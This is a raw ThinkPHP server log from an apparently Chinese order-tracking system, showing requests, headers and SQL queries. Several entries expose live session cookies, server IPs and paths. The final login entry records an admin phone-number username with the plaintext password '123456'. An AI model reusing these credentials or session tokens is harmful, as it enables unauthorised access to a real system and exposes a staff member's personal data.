COLUMNS FROM `ot_outbound` [ RunTime:0.001155s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1758' [ RunTime:0.002791s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1094 LIMIT 1 [ RunTime:0.000452s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1104 LIMIT 1 [ RunTime:0.000240s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1021 LIMIT 1 [ RunTime:0.000224s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1022 LIMIT 1 [ RunTime:0.000207s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 1758 LIMIT 1 [ RunTime:0.000224s ] --------------------------------------------------------------- [ 2022-07-20T17:11:38+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308297 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308297 [运行时间:0.033356s][吞吐率:29.98req/s] [内存消耗:3,849.99kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001184s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1758?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1658308297', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001583s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:38+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.059016s][吞吐率:16.94req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000060s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001249s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001670s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000564s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001669s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000358s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001489s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001097s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308298>orderinfo.end_time desc,1658308298>orderinfo.end_time desc,1658308298-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002479s ] --------------------------------------------------------------- [ 2022-07-20T17:11:38+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021278s][吞吐率:47.00req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001113s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:38+08:00 ] 106.112.205.110 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.050182s][吞吐率:19.93req/s] [内存消耗:5,009.16kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001055s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1758?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '154', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '154', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001495s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008139s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000532s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001631s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (154) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000662s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (154) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000678s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001465s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"154\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"154\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308298) [ RunTime:0.005337s ] --------------------------------------------------------------- [ 2022-07-20T17:11:39+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020843s][吞吐率:47.98req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001186s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:40+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021107s][吞吐率:47.38req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001097s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:40+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021095s][吞吐率:47.41req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001228s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:40+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020355s][吞吐率:49.13req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001063s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:41+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.055928s][吞吐率:17.88req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001105s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001678s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000552s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001495s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000368s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001714s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001199s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308301>orderinfo.end_time desc,1658308301>orderinfo.end_time desc,1658308301-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.002869s ] --------------------------------------------------------------- [ 2022-07-20T17:11:41+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020991s][吞吐率:47.64req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:42+08:00 ] 106.112.205.110 POST /admin/index/login?url=%2F [ info ] 47.105.33.115:8081/admin/index/login?url=%2F [运行时间:0.061926s][吞吐率:16.15req/s] [内存消耗:5,001.48kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001263s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '79', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/index/login?url=%2F', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'url' => '/', '__token__' => '22bf016a4c571f778a05fbd97be62463', 'username' => '15233178605', 'password' => '123456', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001830s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ RUN ] app\admin\controller\Index->login[ 